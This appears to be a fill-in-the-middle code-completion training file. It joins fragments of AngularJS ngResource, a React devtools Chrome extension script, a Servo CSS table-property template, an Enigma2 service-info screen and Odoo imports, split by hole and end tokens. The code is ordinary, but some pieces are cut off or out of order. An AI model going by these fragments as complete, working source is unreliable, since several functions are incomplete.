* If an interceptor object was provided, the promise will instead be resolved with the value
* returned by the interceptor.
*
* - `$resolved`: `true` after first server interaction is completed (either with success or
* rejection), `false` before that. Knowing if the Resource has been resolved is useful in
* data-binding.
*
* The Resource instances and collections have these additional methods:
*
* - `$cancelRequest`: If there is a cancellable, pending request related to the instance or
* collection, calling this method will abort the request.
*
* The Resource instances have these additional methods:
*
* - `toJSON`: It returns a simple object without any of the extra properties added as part of
* the Resource API. This object can be serialized through {@link angular.toJson} safely
* without attaching AngularJS-specific fields. Notice that `JSON.stringify` (and
* `angular.toJson`) automatically use this method when serializing a Resource instance
* (see [MDN](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/JSON/stringify#toJSON%28%29_behavior)).
*
* @example
*
* ### Credit card resource
*
* ```js
// Define CreditCard class
var CreditCard = $resource('/user/:userId/card/:cardId',
{userId:123, cardId:'@id'}, {
charge: {method:'POST', params:{charge:true}}
});
// We can retrieve a collection from the server
var cards = CreditCard.query(function() {
// GET: /user/123/card
// server returns: [ {id:456, number:'1234', name:'Smith'} ];
var card = cards[0];
// each item is an instance of CreditCard
expect(card instanceof CreditCard).toEqual(true);
card.name = "J. Smith";
// non GET methods are mapped onto the instances
card.$save();
// POST: /user/123/card/456 {id:456, number:'1234', name:'J. Smith'}
// server returns: {id:456, number:'1234', name: 'J. Smith'};
// our custom method is mapped as well.
card.$charge({amount:9.99});
// POST: /user/123/card/456?amount=9.99&charge=true {id:456, number:'1234', name:'J. Smith'}
});
// we can create an instance as well
var newCard = new CreditCard({number:'0123'});
newCard.name = "Mike Smith";
newCard.$save();
// POST: /user/123/card {number:'0123', name:'Mike Smith'}
// server returns: {id:789, number:'0123', name: 'Mike Smith'};
expect(newCard.id).toEqual(789);
* ```
*
* The object returned from this function execution is a resource "class" which has "static" method
* for each action in the definition.
*
* Calling these methods invoke `$http` on the `url` template with the given `method`, `params` and
* `headers`.
*
* @example
*
* ### User resource
*
* When the data is returned from the server then the object is an instance of the resource type and
* all of the non-GET methods are available with `$` prefix. This allows you to easily support CRUD
* operations (create, read, update, delete) on server-side data.
```js
var User = $resource('/user/:userId', {userId:'@id'});
User.get({userId:123}, function(user) {
user.abc = true;
user.$save();
});
```
*
* It's worth noting that the success callback for `get`, `query` and other methods gets passed
* in the response that came from the server as well as $http header getter function, so one
* could rewrite the above example and get access to http headers as:
*
```js
var User = $resource('/user/:userId', {userId:'@id'});
User.get({userId:123}, function(user, getResponseHeaders){
user.abc = true;
user.$save(function(user, putResponseHeaders) {
//user => saved user object
//putResponseHeaders => $http header getter
});
});
```
*
* You can also access the raw `$http` promise via the `$promise` property on the object returned
*
```
var User = $resource('/user/:userId', {userId:'@id'});
User.get({userId:123})
.$promise.then(function(user) {
$scope.user = user;
});
```
*
* @example
*
* ### Creating a custom 'PUT' request
*
* In this example we create a custom method on our resource to make a PUT request
* ```js
* var app = angular.module('app', ['ngResource', 'ngRoute']);
*
* // Some APIs expect a PUT request in the format URL/object/ID
* // Here we are creating an 'update' method
* app.factory('Notes', ['$resource', function($resource) {
* return $resource('/notes/:id', null,
* {
* 'update': { method:'PUT' }
* });
* }]);
*
* // In our controller we get the ID from the URL using ngRoute and $routeParams
* // We pass in $routeParams and our Notes factory along with $scope
* app.controller('NotesCtrl', ['$scope', '$routeParams', 'Notes',
function($scope, $routeParams, Notes) {
* // First get a note object from the factory
* var note = Notes.get({ id:$routeParams.id });
* $id = note.id;
*
* // Now call update passing in the ID first then the object you are updating
* Notes.update({ id:$id }, note);
*
* // This will PUT /notes/ID with the note object in the request payload
* }]);
* ```
*
* @example
*
* ### Cancelling requests
*
* If an action's configuration specifies that it is cancellable, you can cancel the request related
* to an instance or collection (as long as it is a result of a "non-instance" call):
*
```js
// ...defining the `Hotel` resource...
var Hotel = $resource('/api/hotel/:id', {id: '@id'}, {
// Let's make the `query()` method cancellable
query: {method: 'get', isArray: true, cancellable: true}
});
// ...somewhere in the PlanVacationController...
...
this.onDestinationChanged = function onDestinationChanged(destination) {
// We don't care about any pending request for hotels
// in a different destination any more
this.availableHotels.$cancelRequest();
// Let's query for hotels in '<destination>'
// (calls: /api/hotel?location=<destination>)
this.availableHotels = Hotel.query({location: destination});
};
```
*
*/
angular.module('ngResource', ['ng']).
info({ angularVersion: '1.6.10' }).
provider('$resource', function ResourceProvider() {
var PROTOCOL_AND_IPV6_REGEX = /^https?:\/\/\[[^\]]*][^/]*/;
var provider = this;
/**
* @ngdoc property
* @name $resourceProvider#defaults
* @description
* Object containing default options used when creating `$resource` instances.
*
* The default values satisfy a wide range of usecases, but you may choose to overwrite any of
* them to further customize your instances. The available properties are:
*
* - **stripTrailingSlashes** – `{boolean}` – If true, then the trailing slashes from any
* calculated URL will be stripped.<br />
* (Defaults to true.)
* - **cancellable** – `{boolean}` – If true, the request made by a "non-instance" call will be
* cancelled (if not already completed) by calling `$cancelRequest()` on the call's return
* value. For more details, see {@link ngResource.$resource}. This can be overwritten per
* resource class or action.<br />
* (Defaults to false.)
* - **actions** - `{Object.<Object>}` - A hash with default actions declarations. Actions are
* high-level methods corresponding to RESTful actions/methods on resources. An action may
* specify what HTTP method to use, what URL to hit, if the return value will be a single
* object or a collection (array) of objects etc. For more details, see
* {@link ngResource.$resource}. The actions can also be enhanced or overwritten per resource
* class.<br />
* The default actions are:
* ```js
* {
* get: {method: 'GET'},
* save: {method: 'POST'},
* query: {method: 'GET', isArray: true},
* remove: {method: 'DELETE'},
* delete: {method: 'DELETE'}
* }
* ```
*
* #### Example
*
* For example, you can specify a new `update` action that uses the `PUT` HTTP verb:
*
* ```js
* angular.
* module('myApp').
* config(['$resourceProvider', function ($resourceProvider) {
* $resourceProvider.defaults.actions.update = {
* method: 'PUT'
* };
* }]);
* ```
*
* Or you can even overwrite the whole `actions` list and specify your own:
*
* ```js
* angular.
* module('myApp').
* config(['$resourceProvider', function ($resourceProvider) {
* $resourceProvider.defaults.actions = {
* create: {method: 'POST'},
* get: {method: 'GET'},
* getAll: {method: 'GET', isArray:true},
* update: {method: 'PUT'},
* delete: {method: 'DELETE'}
* };
* });
* ```
*
*/
this.defaults = {
// Strip slashes by default
stripTrailingSlashes: true,
// Make non-instance requests cancellable (via `$cancelRequest()`)
cancellable: false,
// Default actions configuration
actions: {
'get': {method: 'GET'},
'save': {method: 'POST'},
'query': {method: 'GET', isArray: true},
'remove': {method: 'DELETE'},
'delete': {method: 'DELETE'}
}
};
this.$get = ['$http', '$log', '$q', '$timeout', function($http, $log, $q, $timeout) {
var noop = angular.noop,
forEach = angular.forEach,
extend = angular.extend,
copy = angular.copy,
isArray = angular.isArray,
isDefined = angular.isDefined,
isFunction = angular.isFunction,
isNumber = angular.isNumber,
encodeUriQuery = angular.$$encodeUriQuery,
encodeUriSegment = angular.$$encodeUriSegment;
function Route(template, defaults) {
this.template = template;
this.defaults = extend({}, provider.defaults, defaults);
this.urlParams = {};
}
Route.prototype = {
setUrlParams: function(config, params, actionUrl) {
var self = this,
url = actionUrl || self.template,
val,
encodedVal,
protocolAndIpv6 = '';
var urlParams = self.urlParams = Object.create(null);
forEach(url.split(/\W/), function(param) {
if (param === 'hasOwnProperty') {
throw $resourceMinErr('badname', 'hasOwnProperty is not a valid parameter name.');
}
if (!(new RegExp('^\\d+$').test(param)) && param &&
(new RegExp('(^|[^\\\\]):' + param + '(\\W|$)').test(url))) {
urlParams[param] = {
isQueryParamValue: (new RegExp('\\?.*=:' + param + '(?:\\W|$)')).test(url)
};
}
});
url = url.replace(/\\:/g, ':');
url = url.replace(PROTOCOL_AND_IPV6_REGEX, function(match) {
protocolAndIpv6 = match;
return '';
});
params = params || {};
forEach(self.urlParams, function(paramInfo, urlParam) {
val = params.hasOwnProperty(urlParam) ? params[urlParam] : self.defaults[urlParam];
if (isDefined(val) && val !== null) {
if (paramInfo.isQueryParamValue) {
encodedVal = encodeUriQuery(val, true);
} else {
encodedVal = encodeUriSegment(val);
}
url = url.replace(new RegExp(':' + urlParam + '(\\W|$)', 'g'), function(match, p1) {
return encodedVal + p1;
});
} else {
url = url.replace(new RegExp('(/?):' + urlParam + '(\\W|$)', 'g'), function(match,
leadingSlashes, tail) {
if (tail.charAt(0) === '/') {
return tail;
} else {
return leadingSlashes + tail;
}
});
}
});
// strip trailing slashes and set the url (unless this behavior is specifically disabled)
if (self.defaults.stripTrailingSlashes) {
url = url.replace(/\/+$/, '') || '/';
}
// Collapse `/.` if found in the last URL path segment before the query.
// E.g. `http://url.com/id/.format?q=x` becomes `http://url.com/id.format?q=x`.
url = url.replace(/\/\.(?=\w+($|\?))/, '.');
// Replace escaped `/\.` with `/.`.
// (If `\.` comes from a param value, it will be encoded as `%5C.`.)
config.url = protocolAndIpv6 + url.replace(/\/(\\|%5C)\./, '/.');
// set params - delegate param encoding to $http
forEach(params, function(value, key) {
if (!self.urlParams[key]) {
config.params = config.params || {};
config.params[key] = value;
}
});
}
};
function resourceFactory(url, paramDefaults, actions, options) {
var route = new Route(url, options);
actions = extend({}, provider.defaults.actions, actions);
function extractParams(data, actionParams) {
var ids = {};
actionParams = extend({}, paramDefaults, actionParams);
forEach(actionParams, function(value, key) {
if (isFunction(value)) { value = value(data); }
ids[key] = value && value.charAt && value.charAt(0) === '@' ?
lookupDottedPath(data, value.substr(1)) : value;
});
return ids;
}
function defaultResponseInterceptor(response) {
return response.resource;
}
function Resource(value) {
shallowClearAndCopy(value || {}, this);
}
Resource.prototype.toJSON = function() {
var data = extend({}, this);
delete data.$promise;
delete data.$resolved;
delete data.$cancelRequest;
return data;
};
forEach(actions, function(action, name) {
var hasBody = action.hasBody === true || (action.hasBody !== false && /^(POST|PUT|PATCH)$/i.test(action.method));
var numericTimeout = action.timeout;
var cancellable = isDefined(action.cancellable) ?
action.cancellable : route.defaults.cancellable;
if (numericTimeout && !isNumber(numericTimeout)) {
$log.debug('ngResource:\n' +
' Only numeric values are allowed as `timeout`.\n' +
' Promises are not supported in $resource, because the same value would ' +
'be used for multiple requests. If you are looking for a way to cancel ' +
'requests, you should use the `cancellable` option.');
delete action.timeout;
numericTimeout = null;
}
Resource[name] = function(a1, a2, a3, a4) {
var params = {}, data, success, error;
switch (arguments.length) {
case 4:
error = a4;
success = a3;
// falls through
case 3:
case 2:
if (isFunction(a2)) {
if (isFunction(a1)) {
success = a1;
error = a2;
break;
}
success = a2;
error = a3;
// falls through
} else {
params = a1;
data = a2;
success = a3;
break;
}
// falls through
case 1:
if (isFunction(a1)) success = a1;
else if (hasBody) data = a1;
else params = a1;
break;
case 0: break;
default:
throw $resourceMinErr('badargs',
'Expected up to 4 arguments [params, data, success, error], got {0} arguments',
arguments.length);
}
var isInstanceCall = this instanceof Resource;
var value = isInstanceCall ? data : (action.isArray ? [] : new Resource(data));
var httpConfig = {};
var responseInterceptor = action.interceptor && action.interceptor.response ||
defaultResponseInterceptor;
var responseErrorInterceptor = action.interceptor && action.interceptor.responseError ||
undefined;
var hasError = !!error;
var hasResponseErrorInterceptor = !!responseErrorInterceptor;
var timeoutDeferred;
var numericTimeoutPromise;
forEach(action, function(value, key) {
switch (key) {
default:
httpConfig[key] = copy(value);
break;
case 'params':
case 'isArray':
case 'interceptor':
case 'cancellable':
break;
}
});
if (!isInstanceCall && cancellable) {
timeoutDeferred = $q.defer();
httpConfig.timeout = timeoutDeferred.promise;
if (numericTimeout) {
numericTimeoutPromise = $timeout(timeoutDeferred.resolve, numericTimeout);
}
}
if (hasBody) httpConfig.data = data;
route.setUrlParams(httpConfig,
extend({}, extractParams(data, action.params || {}), params),
action.url);
var promise = $http(httpConfig).then(function(response) {
var data = response.data;
if (data) {
// Need to convert action.isArray to boolean in case it is undefined
if (isArray(data) !== (!!action.isArray)) {
throw $resourceMinErr('badcfg',
'Error in resource configuration for action `{0}`. Expected response to ' +
'contain an {1} but got an {2} (Request: {3} {4})', name, action.isArray ? 'array' : 'object',
isArray(data) ? 'array' : 'object', httpConfig.method, httpConfig.url);
}
if (action.isArray) {
value.length = 0;
forEach(data, function(item) {
if (typeof item === 'object') {
value.push(new Resource(item));
} else {
// Valid JSON values may be string literals, and these should not be converted
// into objects. These items will not have access to the Resource prototype
// methods, but unfortunately there is nothing that can be done about that.
value.push(item);
}
});
} else {
var promise = value.$promise; // Save the promise
shallowClearAndCopy(data, value);
value.$promise = promise; // Restore the promise
}
}
response.resource = value;
return response;
}, function(response) {
response.resource = value;
return $q.reject(response);
});
promise = promise['finally'](function() {
value.$resolved = true;
if (!isInstanceCall && cancellable) {
value.$cancelRequest = noop;
$timeout.cancel(numericTimeoutPromise);
timeoutDeferred = numericTimeoutPromise = httpConfig.timeout = null;
}
});
promise = promise.then(
function(response) {
var value = responseInterceptor(response);
(success || noop)(value, response.headers, response.status, response.statusText);
return value;
},
(hasError || hasResponseErrorInterceptor) ?
function(response) {
if (hasError && !hasResponseErrorInterceptor) {
// Avoid `Possibly Unhandled Rejection` error,
// but still fulfill the returned promise with a rejection
promise.catch(noop);
}
if (hasError) error(response);
return hasResponseErrorInterceptor ?
responseErrorInterceptor(response) :
$q.reject(response);
} :
undefined);
if (!isInstanceCall) {
// we are creating instance / collection
// - set the initial promise
// - return the instance / collection
value.$promise = promise;
value.$resolved = false;
if (cancellable) value.$cancelRequest = cancelRequest;
return value;
}
// instance call
return promise;
function cancelRequest(value) {
promise.catch(noop);
if (timeoutDeferred !== null) {
timeoutDeferred.resolve(value);
}
}
};
Resource.prototype['$' + name] = function(params, success, error) {
if (isFunction(params)) {
error = success; success = params; params = {};
}
var result = Resource[name].call(this, params, this, success, error);
return result.$promise || result;
};
});
return Resource;
}
return resourceFactory;
}];
});
})(window, window.angular);<|fim▁end|>
|
*
* Use `$resourceProvider` to change the default behavior of the {@link ngResource.$resource}
|
<|file_name|>background.js<|end_file_name|><|fim▁begin|>/**
* Copyright (c) 2015-present, Facebook, Inc.
* All rights reserved.
*
* This source code is licensed under the BSD-style license found in the
* LICENSE file in the root directory of this source tree. An additional grant
* of patent rights can be found in the PATENTS file in the same directory.
*
* @flow
*/
'use strict';
/* global chrome */
var ports = {};<|fim▁hole|>
chrome.runtime.onConnect.addListener(function(port) {
var tab = null;
var name = null;
if (isNumeric(port.name)) {
tab = port.name;
name = 'devtools';
installContentScript(+port.name);
} else {
tab = port.sender.tab.id;
name = 'content-script';
}
if (!ports[tab]) {
ports[tab] = {
devtools: null,
'content-script': null,
};
}
ports[tab][name] = port;
if (ports[tab].devtools && ports[tab]['content-script']) {
doublePipe(ports[tab].devtools, ports[tab]['content-script']);
}
});
function isNumeric(str: string): boolean {
return +str + '' === str;
}
function installContentScript(tabId: number) {
chrome.tabs.executeScript(tabId, {file: '/build/contentScript.js'}, function() {
});
}
function doublePipe(one, two) {
one.onMessage.addListener(lOne);
function lOne(message) {
// console.log('dv -> rep', message);
two.postMessage(message);
}
two.onMessage.addListener(lTwo);
function lTwo(message) {
// console.log('rep -> dv', message);
one.postMessage(message);
}
function shutdown() {
one.onMessage.removeListener(lOne);
two.onMessage.removeListener(lTwo);
one.disconnect();
two.disconnect();
}
one.onDisconnect.addListener(shutdown);
two.onDisconnect.addListener(shutdown);
}<|fim▁end|>
| |
<|file_name|>inherited_table.mako.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
<%namespace name="helpers" file="/helpers.mako.rs" />
<% data.new_style_struct("InheritedTable", inherited=True, gecko_name="TableBorder") %>
${helpers.single_keyword("border-collapse", "separate collapse",
gecko_constant_prefix="NS_STYLE_BORDER",
animation_value_type="discrete",
spec="https://drafts.csswg.org/css-tables/#propdef-border-collapse")}
${helpers.single_keyword("empty-cells", "show hide",
gecko_constant_prefix="NS_STYLE_TABLE_EMPTY_CELLS",
animation_value_type="discrete",
spec="https://drafts.csswg.org/css-tables/#propdef-empty-cells")}
${helpers.single_keyword("caption-side", "top bottom",
extra_gecko_values="right left top-outside bottom-outside",
needs_conversion="True",
animation_value_type="discrete",
spec="https://drafts.csswg.org/css-tables/#propdef-caption-side")}
<%helpers:longhand name="border-spacing" animation_value_type="ComputedValue" boxed="True"
spec="https://drafts.csswg.org/css-tables/#propdef-border-spacing">
use app_units::Au;
use std::fmt;
use style_traits::ToCss;
use values::specified::{AllowQuirks, Length};
pub mod computed_value {
use app_units::Au;
use properties::animated_properties::Animatable;
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
#[derive(Clone, Copy, Debug, PartialEq, ToCss)]
pub struct T {
pub horizontal: Au,
pub vertical: Au,
}
/// https://drafts.csswg.org/css-transitions/#animtype-simple-list
impl Animatable for T {
#[inline]
fn add_weighted(&self, other: &Self, self_portion: f64, other_portion: f64)
-> Result<Self, ()> {
Ok(T {
horizontal: try!(self.horizontal.add_weighted(&other.horizontal,
self_portion, other_portion)),
vertical: try!(self.vertical.add_weighted(&other.vertical,
self_portion, other_portion)),
})
}
#[inline]
fn compute_distance(&self, other: &Self) -> Result<f64, ()> {
self.compute_squared_distance(other).map(|sd| sd.sqrt())
}
#[inline]
fn compute_squared_distance(&self, other: &Self) -> Result<f64, ()> {
Ok(try!(self.horizontal.compute_squared_distance(&other.horizontal)) +
try!(self.vertical.compute_squared_distance(&other.vertical)))
}
}
}
#[derive(Clone, Debug, HasViewportPercentage, PartialEq)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub struct SpecifiedValue {
pub horizontal: Length,
pub vertical: Option<Length>,
}
#[inline]
pub fn get_initial_value() -> computed_value::T {
computed_value::T {
horizontal: Au(0),
vertical: Au(0),
}
}
impl ToCss for SpecifiedValue {
fn to_css<W>(&self, dest: &mut W) -> fmt::Result
where W: fmt::Write,
{
try!(self.horizontal.to_css(dest));
if let Some(vertical) = self.vertical.as_ref() {
try!(dest.write_str(" "));
vertical.to_css(dest)?;
}
Ok(())
}
}
impl ToComputedValue for SpecifiedValue {
type ComputedValue = computed_value::T;
#[inline]
fn to_computed_value(&self, context: &Context) -> computed_value::T {
let horizontal = self.horizontal.to_computed_value(context);
computed_value::T {
horizontal: horizontal,
vertical: self.vertical.as_ref().map_or(horizontal, |v| v.to_computed_value(context)),
}
}
#[inline]
fn from_computed_value(computed: &computed_value::T) -> Self {
SpecifiedValue {
horizontal: ToComputedValue::from_computed_value(&computed.horizontal),
vertical: Some(ToComputedValue::from_computed_value(&computed.vertical)),
}
}
}
<|fim▁hole|> pub fn parse<'i, 't>(context: &ParserContext, input: &mut Parser<'i, 't>)
-> Result<SpecifiedValue,ParseError<'i>> {
let mut first = None;
let mut second = None;
match Length::parse_non_negative_quirky(context, input, AllowQuirks::Yes) {
Err(_) => (),
Ok(length) => {
first = Some(length);
if let Ok(len) = input.try(|i| Length::parse_non_negative_quirky(context, i, AllowQuirks::Yes)) {
second = Some(len);
}
}
}
match (first, second) {
(None, None) => Err(StyleParseError::UnspecifiedError.into()),
(Some(length), None) => {
Ok(SpecifiedValue {
horizontal: length,
vertical: None,
})
}
(Some(horizontal), Some(vertical)) => {
Ok(SpecifiedValue {
horizontal: horizontal,
vertical: Some(vertical),
})
}
(None, Some(_)) => unreachable!(),
}
}
</%helpers:longhand><|fim▁end|>
| |
<|file_name|>ServiceInfo.py<|end_file_name|><|fim▁begin|>from Components.HTMLComponent import HTMLComponent
from Components.GUIComponent import GUIComponent
from Screen import Screen
from Components.ActionMap import ActionMap
from Components.Label import Label
from ServiceReference import ServiceReference
from enigma import eListboxPythonMultiContent, eListbox, gFont, iServiceInformation, eServiceCenter
from Tools.Transponder import ConvertToHumanReadable
from Components.Converter.ChannelNumbers import channelnumbers
import skin
RT_HALIGN_LEFT = 0
TYPE_TEXT = 0
TYPE_VALUE_HEX = 1
TYPE_VALUE_DEC = 2
TYPE_VALUE_HEX_DEC = 3
TYPE_SLIDER = 4
TYPE_VALUE_ORBIT_DEC = 5
def to_unsigned(x):
return x & 0xFFFFFFFF
def ServiceInfoListEntry(a, b, valueType=TYPE_TEXT, param=4):
print "b:", b
if not isinstance(b, str):
if valueType == TYPE_VALUE_HEX:
b = ("0x%0" + str(param) + "x") % to_unsigned(b)
elif valueType == TYPE_VALUE_DEC:
b = str(b)
elif valueType == TYPE_VALUE_HEX_DEC:
b = ("0x%0" + str(param) + "x (%dd)") % (to_unsigned(b), b)
elif valueType == TYPE_VALUE_ORBIT_DEC:
direction = 'E'
if b > 1800:
b = 3600 - b
direction = 'W'
b = ("%d.%d%s") % (b // 10, b % 10, direction)
else:
b = str(b)
x, y, w, h = skin.parameters.get("ServiceInfo",(0, 0, 300, 30))
xa, ya, wa, ha = skin.parameters.get("ServiceInfoLeft",(0, 0, 300, 25))
xb, yb, wb, hb = skin.parameters.get("ServiceInfoRight",(300, 0, 600, 25))
return [
#PyObject *type, *px, *py, *pwidth, *pheight, *pfnt, *pstring, *pflags;
(eListboxPythonMultiContent.TYPE_TEXT, x, y, w, h, 0, RT_HALIGN_LEFT, ""),
(eListboxPythonMultiContent.TYPE_TEXT, xa, ya, wa, ha, 0, RT_HALIGN_LEFT, a),
(eListboxPythonMultiContent.TYPE_TEXT, xb, yb, wb, hb, 0, RT_HALIGN_LEFT, b)
]
class ServiceInfoList(HTMLComponent, GUIComponent):
def __init__(self, source):
GUIComponent.__init__(self)
self.l = eListboxPythonMultiContent()
self.list = source
self.l.setList(self.list)
font = skin.fonts.get("ServiceInfo", ("Regular", 23, 25))
self.l.setFont(0, gFont(font[0], font[1]))
self.l.setItemHeight(font[2])
GUI_WIDGET = eListbox
def postWidgetCreate(self, instance):
self.instance.setContent(self.l)
TYPE_SERVICE_INFO = 1
TYPE_TRANSPONDER_INFO = 2
class ServiceInfo(Screen):
def __init__(self, session, serviceref=None):
Screen.__init__(self, session)
self["actions"] = ActionMap(["OkCancelActions", "ColorActions"],
{
"ok": self.close,
"cancel": self.close,
"red": self.information,
"green": self.pids,
"yellow": self.transponder,
"blue": self.tuner
}, -1)
if serviceref:
self.type = TYPE_TRANSPONDER_INFO
self.skinName="ServiceInfoSimple"
info = eServiceCenter.getInstance().info(serviceref)
self.transponder_info = info.getInfoObject(serviceref, iServiceInformation.sTransponderData)
# info is an iStaticServiceInformation, not an iServiceInformation
self.info = None
self.feinfo = None
else:
self.type = TYPE_SERVICE_INFO
self["key_red"] = self["red"] = Label(_("Service"))
self["key_green"] = self["green"] = Label(_("PIDs"))
self["key_yellow"] = self["yellow"] = Label(_("Multiplex"))
self["key_blue"] = self["blue"] = Label(_("Tuner status"))
service = session.nav.getCurrentService()
if service is not None:
self.info = service.info()
self.feinfo = service.frontendInfo()
else:
self.info = None
self.feinfo = None
tlist = [ ]
self["infolist"] = ServiceInfoList(tlist)
self.onShown.append(self.information)
def information(self):
if self.type == TYPE_SERVICE_INFO:
if self.session.nav.getCurrentlyPlayingServiceOrGroup():
name = ServiceReference(self.session.nav.getCurrentlyPlayingServiceReference()).getServiceName()
refstr = self.session.nav.getCurrentlyPlayingServiceReference().toString()
else:
name = _("N/A")
refstr = _("N/A")
aspect = "-"
videocodec = "-"
resolution = "-"
if self.info:
videocodec = ("MPEG2", "MPEG4", "MPEG1", "MPEG4-II", "VC1", "VC1-SM", "-" )[self.info and self.info.getInfo(iServiceInformation.sVideoType)]
width = self.info.getInfo(iServiceInformation.sVideoWidth)
height = self.info.getInfo(iServiceInformation.sVideoHeight)
if width > 0 and height > 0:
resolution = "%dx%d" % (width,height)
resolution += ("i", "p", "")[self.info.getInfo(iServiceInformation.sProgressive)]
resolution += str((self.info.getInfo(iServiceInformation.sFrameRate) + 500) / 1000)
aspect = self.getServiceInfoValue(iServiceInformation.sAspect)
if aspect in ( 1, 2, 5, 6, 9, 0xA, 0xD, 0xE ):
aspect = "4:3"
else:
aspect = "16:9"
Labels = ( (_("Name"), name, TYPE_TEXT),
(_("Provider"), self.getServiceInfoValue(iServiceInformation.sProvider), TYPE_TEXT),
(_("Videoformat"), aspect, TYPE_TEXT),
(_("Videosize"), resolution, TYPE_TEXT),
(_("Videocodec"), videocodec, TYPE_TEXT),
(_("Namespace"), self.getServiceInfoValue(iServiceInformation.sNamespace), TYPE_VALUE_HEX, 8),
(_("Service reference"), refstr, TYPE_TEXT))
self.fillList(Labels)
else:
if self.transponder_info:
tp_info = ConvertToHumanReadable(self.transponder_info)
conv = { "tuner_type" : _("Transponder type"),
"system" : _("System"),
"modulation" : _("Modulation"),
"orbital_position" : _("Orbital position"),
"frequency" : _("Frequency"),
"symbol_rate" : _("Symbol rate"),
"bandwidth" : _("Bandwidth"),
"polarization" : _("Polarization"),
"inversion" : _("Inversion"),
"pilot" : _("Pilot"),
"rolloff" : _("Roll-off"),
"fec_inner" : _("FEC"),
"code_rate_lp" : _("Coderate LP"),
"code_rate_hp" : _("Coderate HP"),
"constellation" : _("Constellation"),
"transmission_mode": _("Transmission mode"),
"guard_interval" : _("Guard interval"),
"hierarchy_information": _("Hierarchy information") }
Labels = [(conv[i], tp_info[i], i == "orbital_position" and TYPE_VALUE_ORBIT_DEC or TYPE_VALUE_DEC) for i in tp_info.keys() if i in conv]
self.fillList(Labels)
def pids(self):
if self.type == TYPE_SERVICE_INFO:
Labels = ( (_("Video PID"), self.getServiceInfoValue(iServiceInformation.sVideoPID), TYPE_VALUE_HEX_DEC, 4),
(_("Audio PID"), self.getServiceInfoValue(iServiceInformation.sAudioPID), TYPE_VALUE_HEX_DEC, 4),
(_("PCR PID"), self.getServiceInfoValue(iServiceInformation.sPCRPID), TYPE_VALUE_HEX_DEC, 4),
(_("PMT PID"), self.getServiceInfoValue(iServiceInformation.sPMTPID), TYPE_VALUE_HEX_DEC, 4),
(_("TXT PID"), self.getServiceInfoValue(iServiceInformation.sTXTPID), TYPE_VALUE_HEX_DEC, 4),
(_("TSID"), self.getServiceInfoValue(iServiceInformation.sTSID), TYPE_VALUE_HEX_DEC, 4),
(_("ONID"), self.getServiceInfoValue(iServiceInformation.sONID), TYPE_VALUE_HEX_DEC, 4),
(_("SID"), self.getServiceInfoValue(iServiceInformation.sSID), TYPE_VALUE_HEX_DEC, 4))
self.fillList(Labels)
def showFrontendData(self, real):
if self.type == TYPE_SERVICE_INFO:
frontendData = self.feinfo and self.feinfo.getAll(real)
Labels = self.getFEData(frontendData)
self.fillList(Labels)
def transponder(self):
if self.type == TYPE_SERVICE_INFO:
self.showFrontendData(True)
def tuner(self):
if self.type == TYPE_SERVICE_INFO:
self.showFrontendData(False)
def getFEData(self, frontendDataOrg):
if frontendDataOrg and len(frontendDataOrg):<|fim▁hole|> (_("System"), frontendData["system"], TYPE_TEXT),
(_("Modulation"), frontendData["modulation"], TYPE_TEXT),
(_("Orbital position"), frontendData["orbital_position"], TYPE_VALUE_DEC),
(_("Frequency"), frontendData["frequency"], TYPE_VALUE_DEC),
(_("Symbol rate"), frontendData["symbol_rate"], TYPE_VALUE_DEC),
(_("Polarization"), frontendData["polarization"], TYPE_TEXT),
(_("Inversion"), frontendData["inversion"], TYPE_TEXT),
(_("FEC"), frontendData["fec_inner"], TYPE_TEXT),
(_("Pilot"), frontendData.get("pilot", None), TYPE_TEXT),
(_("Roll-off"), frontendData.get("rolloff", None), TYPE_TEXT))
elif frontendDataOrg["tuner_type"] == "DVB-C":
return ((_("NIM"), chr(ord('A') + frontendData["tuner_number"]), TYPE_TEXT),
(_("Type"), frontendData["tuner_type"], TYPE_TEXT),
(_("Modulation"), frontendData["modulation"], TYPE_TEXT),
(_("Frequency"), frontendData["frequency"], TYPE_VALUE_DEC),
(_("Symbol rate"), frontendData["symbol_rate"], TYPE_VALUE_DEC),
(_("Inversion"), frontendData["inversion"], TYPE_TEXT),
(_("FEC"), frontendData["fec_inner"], TYPE_TEXT))
elif frontendDataOrg["tuner_type"] == "DVB-T":
return ((_("NIM"), chr(ord('A') + frontendData["tuner_number"]), TYPE_TEXT),
(_("Type"), frontendData["tuner_type"], TYPE_TEXT),
(_("Frequency"), frontendData["frequency"], TYPE_VALUE_DEC),
(_("Channel"), channelnumbers.getChannelNumber(frontendData["frequency"], frontendData["tuner_number"]), TYPE_VALUE_DEC),
(_("Inversion"), frontendData["inversion"], TYPE_TEXT),
(_("Bandwidth"), frontendData["bandwidth"], TYPE_VALUE_DEC),
(_("Code rate LP"), frontendData["code_rate_lp"], TYPE_TEXT),
(_("Code rate HP"), frontendData["code_rate_hp"], TYPE_TEXT),
(_("Constellation"), frontendData["constellation"], TYPE_TEXT),
(_("Transmission mode"), frontendData["transmission_mode"], TYPE_TEXT),
(_("Guard interval"), frontendData["guard_interval"], TYPE_TEXT),
(_("Hierarchy info"), frontendData["hierarchy_information"], TYPE_TEXT))
return [ ]
def fillList(self, Labels):
tlist = [ ]
for item in Labels:
if item[1] is None:
continue;
value = item[1]
if len(item) < 4:
tlist.append(ServiceInfoListEntry(item[0]+":", value, item[2]))
else:
tlist.append(ServiceInfoListEntry(item[0]+":", value, item[2], item[3]))
self["infolist"].l.setList(tlist)
def getServiceInfoValue(self, what):
if self.info is None:
return ""
v = self.info.getInfo(what)
if v == -2:
v = self.info.getInfoString(what)
elif v == -1:
v = _("N/A")
return v<|fim▁end|>
|
frontendData = ConvertToHumanReadable(frontendDataOrg)
if frontendDataOrg["tuner_type"] == "DVB-S":
return ((_("NIM"), chr(ord('A') + frontendData["tuner_number"]), TYPE_TEXT),
(_("Type"), frontendData["tuner_type"], TYPE_TEXT),
|
<|file_name|>procurement.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from psycopg2 import OperationalError
from odoo import api, fields, models, registry, _
from odoo.exceptions import UserError
import odoo.addons.decimal_precision as dp
